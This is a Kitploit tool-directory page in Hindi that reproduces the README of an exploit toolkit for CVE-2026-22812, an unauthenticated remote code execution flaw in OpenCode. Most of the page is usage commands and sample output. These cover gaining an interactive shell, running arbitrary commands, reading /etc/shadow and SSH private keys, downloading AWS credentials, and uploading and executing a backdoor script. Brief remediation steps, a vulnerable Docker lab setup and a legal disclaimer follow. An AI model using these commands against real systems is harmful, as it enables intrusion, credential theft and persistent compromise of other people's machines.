Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22812-exploit — CVE-2026-22812 (OpenCode अनधिकृत RCE) के लिए शोषण टूलकिट, जो अधिकृत सुरक्षा परीक्षण के लिए इंटरैक्टिव शेल, मनमाना कमांड निष्पादन, फ़ाइल अपलोड/डाउनलोड और सिस्टम एन्यूमरेशन प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/rohmatariow/cve-2026-22812-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubrohmatariow/cve-2026-22812-exploit

CVE-2026-22812-exploit

CVE-2026-22812 (OpenCode अनधिकृत RCE) के लिए शोषण टूलकिट, जो अधिकृत सुरक्षा परीक्षण के लिए इंटरैक्टिव शेल, मनमाना कमांड निष्पादन, फ़ाइल अपलोड/डाउनलोड और सिस्टम एन्यूमरेशन प्रदान करता है।

रिपॉजिटरी देखें
346108 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-22812 एक्सप्लॉइट टूल

Python CVSS

CVE-2026-22812 के लिए पूर्ण-विशेषताओं वाला एक्सप्लॉइटेशन टूलकिट - OpenCode अनप्रमाणित RCE


🎯 अवलोकन

CVE-2026-22812 एक्सप्लॉइट टूल OpenCode अनप्रमाणित रिमोट कोड एक्सेक्यूशन भेद्यता के लिए एक व्यापक एक्सप्लॉइटेशन फ्रेमवर्क है। यह टूल कई एक्सप्लॉइटेशन विधियाँ प्रदान करता है जिनमें इंटरैक्टिव शेल, फ़ाइल संचालन और सिस्टम एन्यूमरेशन शामिल हैं।

भेद्यता विवरण

  • CVE ID: CVE-2026-22812
  • प्रभावित: OpenCode < 1.0.216
  • CVSS स्कोर: 8.8 (उच्च)
  • अटैक वेक्टर: नेटवर्क
  • प्रमाणीकरण: कोई आवश्यक नहीं
  • प्रभाव: पूर्ण सिस्टम समझौता

✨ विशेषताएँ

🔓 एक्सप्लॉइटेशन क्षमताएँ

  • ✅ अनप्रमाणित सत्र निर्माण
  • ✅ मनमाना कमांड निष्पादन (RCE)
  • ✅ कमांड इतिहास के साथ इंटरैक्टिव शेल
  • ✅ फ़ाइल अपलोड/डाउनलोड
  • ✅ मनमाना फ़ाइल पढ़ना
  • ✅ PTY सत्र निर्माण
  • ✅ सिस्टम एन्यूमरेशन
  • ✅ प्रॉक्सी समर्थन (Burp Suite संगत)

📦 स्थापना

पूर्वापेक्षाएँ

  • Python 3.7+
  • pip
  • requests लाइब्रेरी

त्वरित स्थापना

root@kitploit:~
# Clone repository
git clone https://github.com/rohmatariow/CVE-2026-22812-exploit.git
cd CVE-2026-22812-exploit

# Install dependencies
pip3 install -r requirements.txt

मैनुअल स्थापना

root@kitploit:~
pip3 install requests urllib3

🚀 उपयोग

बुनियादी एक्सप्लॉइटेशन

1. लक्ष्य भेद्य है या नहीं सत्यापित करें

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 --verify

आउटपुट:

root@kitploit:~
[+] Target is VULNERABLE to CVE-2026-22812!
[+] Session ID: abc123def456

2. एकल कमांड निष्पादित करें

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 -c "id"

आउटपुट:

root@kitploit:~
[*] Creating session...
[+] Session created: abc123def456
[+] Target is VULNERABLE!

[*] Executing: id
[+] Command executed successfully

uid=1000(developer) gid=1000(developer) groups=1000(developer)

3. इंटरैक्टिव शेल मोड

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 -i

इंटरैक्टिव सत्र:

root@kitploit:~
[+] Session created: abc123def456
[+] Target is VULNERABLE!

[*] Entering interactive shell mode
[!] Type 'help' for commands, 'exit' to quit

developer@target$ whoami
developer

developer@target$ pwd
/home/developer/workspace

developer@target$ ls -la
total 48
drwxr-xr-x  8 developer developer 4096 Jan 16 10:30 .
drwxr-xr-x  3 developer developer 4096 Jan 15 09:20 ..
-rw-r--r--  1 developer developer  220 Jan 15 09:20 .bash_logout
...

developer@target$ read /etc/hostname
[*] Reading file: /etc/hostname
[+] File read successfully (10 bytes)
dev-server-01

developer@target$ exit
[*] Exiting...

📚 विस्तृत उपयोग

कमांड निष्पादन

root@kitploit:~
# Single command
python3 exploit.py -t http://target:4096 -c "whoami"

# Complex command
python3 exploit.py -t http://target:4096 -c "ps aux | grep opencode"

# Multiple commands
python3 exploit.py -t http://target:4096 -c "cd /tmp && ls -la && pwd"

फ़ाइल संचालन

फ़ाइलें पढ़ें

root@kitploit:~
# Read sensitive files
python3 exploit.py -t http://target:4096 -r /etc/passwd
python3 exploit.py -t http://target:4096 -r /etc/shadow
python3 exploit.py -t http://target:4096 -r ~/.ssh/id_rsa

फ़ाइलें अपलोड करें

root@kitploit:~
# Upload shell script
python3 exploit.py -t http://target:4096 --upload shell.sh /tmp/shell.sh

# Upload binary
python3 exploit.py -t http://target:4096 --upload payload.elf /tmp/payload

# Upload with execution
python3 exploit.py -t http://target:4096 --upload backdoor.sh /tmp/bd.sh
python3 exploit.py -t http://target:4096 -c "chmod +x /tmp/bd.sh && /tmp/bd.sh"

फ़ाइलें डाउनलोड करें

root@kitploit:~
# Download configuration
python3 exploit.py -t http://target:4096 --download /etc/hosts ./hosts.txt

# Download credentials
python3 exploit.py -t http://target:4096 --download ~/.aws/credentials ./aws_creds.txt

# Download source code
python3 exploit.py -t http://target:4096 --download /app/config.json ./config.json

सिस्टम एन्यूमरेशन

root@kitploit:~
# Gather system information
python3 exploit.py -t http://target:4096 --sysinfo

आउटपुट:

root@kitploit:~
{
  "hostname": "dev-server-01",
  "username": "developer",
  "user_id": "uid=1000(developer) gid=1000(developer)",
  "current_dir": "/home/developer/workspace",
  "kernel": "Linux dev-server-01 5.15.0-91-generic x86_64",
  "os_release": "Ubuntu 22.04.3 LTS",
  "ip_address": "192.168.1.10",
  "processes": "..."
}

उपचार

  1. तुरंत अपडेट करें: npm install -g opencode-ai@latest
  2. प्रक्रियाएँ समाप्त करें: pkill -f opencode
  3. लॉग जाँचें: समझौते के संकेतों के लिए सिस्टम लॉग की समीक्षा करें
  4. क्रेडेंशियल बदलें: पासवर्ड, SSH कुंजियाँ बदलें
  5. सिस्टम ऑडिट करें: बैकडोर की जाँच करें

🧪 परीक्षण प्रयोगशाला सेटअप

Docker का उपयोग करके (अनुशंसित)

root@kitploit:~
# Dockerfile for vulnerable OpenCode
FROM node:18
RUN npm install -g [email protected]
EXPOSE 4096
CMD ["opencode"]
root@kitploit:~
# Build and run
docker build -t opencode-vuln .
docker run -p 4096:4096 opencode-vuln

# Test exploit
python3 exploit.py -t http://localhost:4096 -i

मैनुअल सेटअप

root@kitploit:~
# Install vulnerable version
npm install -g [email protected]

# Start OpenCode
opencode

# In another terminal, run exploit
python3 exploit.py -t http://localhost:4096 --verify

⚠️ भेद्य संस्करणों को कभी भी प्रोडक्शन में तैनात न करें!


📚 संदर्भ

भेद्यता जानकारी

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-22812
  • GitHub Advisory: https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
  • MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22812=

⚠️ कानूनी अस्वीकरण

ध्यान से पढ़ें

यह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

❌ निषिद्ध उपयोग

  • अनधिकृत सिस्टम पहुँच
  • बिना अनुमति के स्कैनिंग
  • कोई भी अवैध गतिविधियाँ
  • दुर्भावनापूर्ण उद्देश्य
  • बिना प्राधिकरण के प्रोडक्शन सिस्टम

कानूनी सूचना

लेखक:

  • अवैध उपयोग का समर्थन नहीं करते
  • दुरुपयोग के लिए ज़िम्मेदार नहीं हैं
  • अवैध गतिविधियों का समर्थन नहीं करेंगे
  • कोई दायित्व नहीं मानते

इस टूल का उपयोग करके, आप सहमत हैं:

  • उचित प्राधिकरण प्राप्त करने के लिए
  • सभी कानूनों का पालन करने के लिए
  • पूर्ण ज़िम्मेदारी स्वीकार करने के लिए
  • नैतिक और ज़िम्मेदारी से उपयोग करने के लिए

अपने जोखिम पर उपयोग करें


⭐ उपयोगी हो तो स्टार करें! ⭐
केवल अधिकृत सुरक्षा परीक्षण के लिए

टूल डाउनलोड करें